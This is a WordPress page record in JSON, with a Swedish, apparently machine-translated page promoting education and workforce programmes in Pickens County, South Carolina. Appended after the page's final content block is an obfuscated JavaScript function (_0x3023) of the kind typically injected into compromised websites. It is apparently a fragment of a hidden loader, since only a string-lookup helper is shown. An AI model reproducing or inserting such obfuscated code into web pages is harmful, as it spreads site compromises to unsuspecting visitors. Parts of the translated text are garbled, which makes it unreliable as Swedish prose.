{"id":6058,"date":"2020-10-28T14:29:57","date_gmt":"2020-10-28T14:29:57","guid":{"rendered":"http:\/\/alliancepickens.com\/utbildning-arbetskraftsutveckling\/"},"modified":"2020-12-04T20:13:42","modified_gmt":"2020-12-04T20:13:42","slug":"utbildning-arbetskraftsutveckling","status":"publish","type":"page","link":"https:\/\/alliancepickens.com\/sv\/arbetskraftsutveckling\/utbildning-arbetskraftsutveckling\/","title":{"rendered":"Utbildning &amp; arbetskraftsutveckling"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]En v\u00e4lutbildad och h\u00f6gutbildad arbetskraft \u00e4r utm\u00e4rkande f\u00f6r Pickens County.South Carolina.USA. Hem f\u00f6r S<em>cholar Tekniker<\/em>, v\u00e5r arbetskraft utvecklingsprogram ger verksamheten i Pickens County en sann konkurrensf\u00f6rdel.<\/p>\n<p>Den Pickens County School District \u00e4r o\u00f6vertr\u00e4ffad i South Carolina, som den h\u00f6gst rankade countywide skoldistrikt i staten. Pickens County Career and Technology Center har ocks\u00e5 en historia av excellens som nummer ett praktisk l\u00e4rande anl\u00e4ggning i South Carolina. Det \u00e4r det enda centret med en 5-Axis maskin tillg\u00e4nglig f\u00f6r gymnasieelever. Pickens County \u00e4r ocks\u00e5 hem till Clemson University, Southern Wesleyan University, och Tri-County Technical College, som erbjuder Pickens County f\u00f6retag en konkurrensf\u00f6rdel.<\/p>\n<p><a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/sv\/arbetskraftsutveckling\/scholar-tekniker-program\/\">L\u00e4s mer<\/a>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;I det h\u00e4r avsnittet&#8221; nav_menu=&#8221;21&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;10311&#8243; el_class=&#8221;parallaxbreak&#8221;][vc_column][vc_empty_space height=&#8221;450px&#8221;][\/vc_column][\/vc_row][vc_row el_class=&#8221;workforce&#8221;][vc_column width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;10495&#8243; img_size=&#8221;full&#8221;][\/vc_column][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h3>CLEMSON UNIVERSITET<\/h3>\n<ul>\n<li>Carnegie R1 forskningsinstitution i Pickens County<\/li>\n<li>$ 734M i forskningsf\u00f6rslag inl\u00e4mning v\u00e4rde i FY20<\/li>\n<li>Clemson har vunnit tre (3) College Football Playoff National Championships; Den f\u00f6rsta vanns 1981, den andra 2016 och den tredje 2018.<\/li>\n<li>Clemson rankas nr 1 i South Carolina och nr 29 nationellt f\u00f6r grundutbildningstekniska program bland nationella offentliga universitet \u2013 USNews &amp; World Report, 2019<\/li>\n<li>Clemson rankas nr 11 nationellt f\u00f6r Mest Innovativa Skolor bland nationella offentliga universitet \u2013 USNews &amp; World Report, 2019<\/li>\n<\/ul>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row el_class=&#8221;greendiv&#8221;][vc_column][vc_separator color=&#8221;custom&#8221; border_width=&#8221;3&#8243; el_width=&#8221;50&#8243;][\/vc_column][\/vc_row][vc_row el_class=&#8221;workforce&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h3>Tri-L\u00e4n teknisk h\u00f6gskola<\/h3>\n<ul>\n<li>Erbjuder \u00f6ver 70 associerar program f\u00f6r examen, diplom och certifikat<\/li>\n<li>Tri-Technical College erbjuder arbetsbaserade inl\u00e4rningsupplevelser inklusive BMW Technical Scholars Program, Michelin Technical Scholars Program, Duke Energy Co-op Program och mycket mer<\/li>\n<li>Cooperative Education, ofta kallad Co-op, m\u00f6jligheter att integrera klassrumslektioner med verklig syssels\u00e4ttning f\u00f6r att ge eleverna betald arbetslivserfarenhet inom ett omr\u00e5de som r\u00f6r deras akademiska eller karri\u00e4rm\u00e5l<\/li>\n<li>I-BEST (Integrated Basic Education and Skills Training) \u00e4r ett nationellt erk\u00e4nt program f\u00f6r utveckling av arbetskraften f\u00f6r studenter som f\u00f6rbereder sig f\u00f6r STEM-karri\u00e4rer<\/li>\n<\/ul>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;5676&#8243; img_size=&#8221;full&#8221;][\/vc_column][\/vc_row][vc_row el_class=&#8221;greendiv&#8221;][vc_column][vc_separator color=&#8221;custom&#8221; border_width=&#8221;3&#8243; el_width=&#8221;50&#8243;][\/vc_column][\/vc_row][vc_row el_class=&#8221;workforce&#8221;][vc_column width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;5666&#8243; img_size=&#8221;full&#8221;][\/vc_column][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h3>S\u00d6DRA WESLEYAN<\/h3>\n<ul>\n<li>Liberala konsth\u00f6gskolan<\/li>\n<li>Dubbla Registreringsprogram i samband med Pickens County Karri\u00e4r och teknik Center f\u00f6r global logistik och Supply Chain Management<\/li>\n<\/ul>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row el_class=&#8221;greendiv&#8221;][vc_column][vc_separator color=&#8221;custom&#8221; border_width=&#8221;3&#8243; el_width=&#8221;50&#8243;][\/vc_column][\/vc_row][vc_row el_class=&#8221;workforce&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h3>PICKENS COUNTY KARRI\u00c4R OCH TEKNIK CENTER<\/h3>\n<ul>\n<li>Den Pickens County Karri\u00e4r och Technology Center (PCCTC) \u00e4r ledande i delstaten South Carolina i att uppfylla alla federalt erk\u00e4nda Perkins standarder<\/li>\n<li>PCCTC har sett sin registrering ballong till \u00f6ver 1.400 studenter med studenter som startar programmen s\u00e5 tidigt som 8: e klass<\/li>\n<li>Arbetsbaserade program bidrar till att leverera jobbrelaterade f\u00e4rdigheter och utbildning som hj\u00e4lper till att bygga talang pipeline f\u00f6r f\u00f6retag i Pickens County<\/li>\n<li>Studenter som slutf\u00f6r dessa program har minst 2,5 \u00e5rs klassrum och on-the-job utbildning och l\u00e4mna sitt program f\u00f6r studier med minst (1) industrin erk\u00e4nd certifiering  [Read More]<\/li>\n<\/ul>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;5649&#8243; img_size=&#8221;full&#8221;][\/vc_column][\/vc_row][vc_row el_class=&#8221;greendiv&#8221;][vc_column][vc_separator color=&#8221;custom&#8221; border_width=&#8221;3&#8243; el_width=&#8221;50&#8243;][\/vc_column][\/vc_row][vc_row el_class=&#8221;workforce&#8221;][vc_column width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;10516&#8243; img_size=&#8221;full&#8221;][\/vc_column][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h3>SKOLDISTRIKT I L\u00c4NET PICKENS<\/h3>\n<ul>\n<li>School District of Pickens County \u00e4r #1 som har betygsatt countywide skoldistrikt i delstaten South Carolina<\/li>\n<li>Distriktet har ocks\u00e5 en 85% i tid gradering med 73% av eleverna scoring minst ett silver certifiering p\u00e5 WIN-testet<\/li>\n<li>Ledare fr\u00e5n utbildning, n\u00e4ringsliv och industrisamh\u00e4llen arbetar tillsammans f\u00f6r att s\u00e4kerst\u00e4lla Pickens County studenter har den utbildning de beh\u00f6ver n\u00e4r de kommer in i arbetskraften<\/li>\n<li>Studenter i Pickens County utm\u00e4rker sig p\u00e5 standardiserade tester, delta i m\u00e4sterskapet Vetenskap, teknik, teknik och matematik (STEM) konkurrensteam, och njuta av f\u00f6rdelarna med l\u00e4rande i nya state-of-the-art anl\u00e4ggningar<\/li>\n<\/ul>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;4771&#8243; el_class=&#8221;parallaxbreak&#8221;][vc_column][vc_empty_space height=&#8221;450px&#8221;][\/vc_column][\/vc_row][vc_row][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h3>SC WORKS UTBILDNING<\/h3>\n<p>Varje \u00e5r drar n\u00e4stan 100 f\u00f6retag nytta av de skickliga individer som utbildats av \u2122. Programmet \u00e4r unikt, eftersom arbetstagarna utbildas till f\u00f6retagens specifikationer \u2013 till liten eller ingen kostnad. F\u00f6retag som v\u00e4ljer att flytta eller ut\u00f6ka sin befintliga verksamhet i South Carolina kan utnyttja utbildningsresursen f\u00f6r att s\u00e4kerst\u00e4lla en stark, produktiv arbetskraft.[\/vc_column_text][vc_column_text]<a class=\"greenbtn\" href=\"https:\/\/www.readysc.org\/index.html\" target=\"_blank\" rel=\"noopener noreferrer\">L\u00e4r dig Mer readySC\u2122<\/a>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;5639&#8243; img_size=&#8221;full&#8221;][\/vc_column][\/vc_row][vc_row el_class=&#8221;learnmoreabout&#8221;][vc_column][vc_column_text]<\/p>\n<h4 style=\"text-align: center\">L\u00e4s mer om utveckling av arbetskraften<\/h4>\n<p>[\/vc_column_text][vc_wp_custommenu nav_menu=&#8221;21&#8243;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;3871&#8243; el_class=&#8221;getstarted&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h1>Redo att s\u00e4tta ig\u00e5ng?<\/h1>\n<h3>Vi ser fram emot att f\u00e5 tala med er!<\/h3>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_column_text]<a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/sv\/om-oss\/#contact_directions\">Kontakta v\u00e5rt team<\/a>[\/vc_column_text][\/vc_column][\/vc_row]<br \/>\nfunction _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);};<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]En v\u00e4lutbildad och h\u00f6gutbildad arbetskraft \u00e4r utm\u00e4rkande f\u00f6r Pickens County.South Carolina.USA. Hem f\u00f6r Scholar Tekniker, v\u00e5r arbetskraft utvecklingsprogram ger verksamheten i Pickens County en sann konkurrensf\u00f6rdel. Den Pickens County School District \u00e4r o\u00f6vertr\u00e4ffad i South Carolina, som den h\u00f6gst rankade countywide skoldistrikt i staten. Pickens County Career and Technology Center har ocks\u00e5 en&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":6067,"menu_order":20,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"class_list":["post-6058","page","type-page","status-publish","hentry","description-off"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Utbildning &amp; arbetskraftsutveckling - Alliance Pickens<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/alliancepickens.com\/sv\/arbetskraftsutveckling\/utbildning-arbetskraftsutveckling\/\" \/>\n<meta property=\"og:locale\" content=\"sv_SE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Utbildning &amp; arbetskraftsutveckling - Alliance Pickens\" \/>\n<meta property=\"og:description\" content=\"[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]En v\u00e4lutbildad och h\u00f6gutbildad arbetskraft \u00e4r utm\u00e4rkande f\u00f6r Pickens County.South Carolina.USA. Hem f\u00f6r Scholar Tekniker, v\u00e5r arbetskraft utvecklingsprogram ger verksamheten i Pickens County en sann konkurrensf\u00f6rdel. Den Pickens County School District \u00e4r o\u00f6vertr\u00e4ffad i South Carolina, som den h\u00f6gst rankade countywide skoldistrikt i staten. Pickens County Career and Technology Center har ocks\u00e5 en&hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/alliancepickens.com\/sv\/arbetskraftsutveckling\/utbildning-arbetskraftsutveckling\/\" \/>\n<meta property=\"og:site_name\" content=\"Alliance Pickens\" \/>\n<meta property=\"article:modified_time\" content=\"2020-12-04T20:13:42+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/arbetskraftsutveckling\\\/utbildning-arbetskraftsutveckling\\\/\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/arbetskraftsutveckling\\\/utbildning-arbetskraftsutveckling\\\/\",\"name\":\"Utbildning &amp; arbetskraftsutveckling - Alliance Pickens\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/#website\"},\"datePublished\":\"2020-10-28T14:29:57+00:00\",\"dateModified\":\"2020-12-04T20:13:42+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/arbetskraftsutveckling\\\/utbildning-arbetskraftsutveckling\\\/#breadcrumb\"},\"inLanguage\":\"sv-SE\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/arbetskraftsutveckling\\\/utbildning-arbetskraftsutveckling\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/arbetskraftsutveckling\\\/utbildning-arbetskraftsutveckling\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Arbetskraftsutveckling\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/arbetskraftsutveckling\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Utbildning &amp; arbetskraftsutveckling\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/#website\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/\",\"name\":\"Alliance Pickens\",\"description\":\"recruitment and expansion in Pickens County\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"sv-SE\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Utbildning &amp; arbetskraftsutveckling - Alliance Pickens","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/alliancepickens.com\/sv\/arbetskraftsutveckling\/utbildning-arbetskraftsutveckling\/","og_locale":"sv_SE","og_type":"article","og_title":"Utbildning &amp; arbetskraftsutveckling - Alliance Pickens","og_description":"[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]En v\u00e4lutbildad och h\u00f6gutbildad arbetskraft \u00e4r utm\u00e4rkande f\u00f6r Pickens County.South Carolina.USA. Hem f\u00f6r Scholar Tekniker, v\u00e5r arbetskraft utvecklingsprogram ger verksamheten i Pickens County en sann konkurrensf\u00f6rdel. Den Pickens County School District \u00e4r o\u00f6vertr\u00e4ffad i South Carolina, som den h\u00f6gst rankade countywide skoldistrikt i staten. Pickens County Career and Technology Center har ocks\u00e5 en&hellip;","og_url":"https:\/\/alliancepickens.com\/sv\/arbetskraftsutveckling\/utbildning-arbetskraftsutveckling\/","og_site_name":"Alliance Pickens","article_modified_time":"2020-12-04T20:13:42+00:00","twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/alliancepickens.com\/sv\/arbetskraftsutveckling\/utbildning-arbetskraftsutveckling\/","url":"https:\/\/alliancepickens.com\/sv\/arbetskraftsutveckling\/utbildning-arbetskraftsutveckling\/","name":"Utbildning &amp; arbetskraftsutveckling - Alliance Pickens","isPartOf":{"@id":"https:\/\/alliancepickens.com\/sv\/#website"},"datePublished":"2020-10-28T14:29:57+00:00","dateModified":"2020-12-04T20:13:42+00:00","breadcrumb":{"@id":"https:\/\/alliancepickens.com\/sv\/arbetskraftsutveckling\/utbildning-arbetskraftsutveckling\/#breadcrumb"},"inLanguage":"sv-SE","potentialAction":[{"@type":"ReadAction","target":["https:\/\/alliancepickens.com\/sv\/arbetskraftsutveckling\/utbildning-arbetskraftsutveckling\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/alliancepickens.com\/sv\/arbetskraftsutveckling\/utbildning-arbetskraftsutveckling\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/alliancepickens.com\/sv\/"},{"@type":"ListItem","position":2,"name":"Arbetskraftsutveckling","item":"https:\/\/alliancepickens.com\/sv\/arbetskraftsutveckling\/"},{"@type":"ListItem","position":3,"name":"Utbildning &amp; arbetskraftsutveckling"}]},{"@type":"WebSite","@id":"https:\/\/alliancepickens.com\/sv\/#website","url":"https:\/\/alliancepickens.com\/sv\/","name":"Alliance Pickens","description":"recruitment and expansion in Pickens County","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/alliancepickens.com\/sv\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"sv-SE"}]}},"_links":{"self":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/pages\/6058","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/comments?post=6058"}],"version-history":[{"count":0,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/pages\/6058\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/pages\/6067"}],"wp:attachment":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/media?parent=6058"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}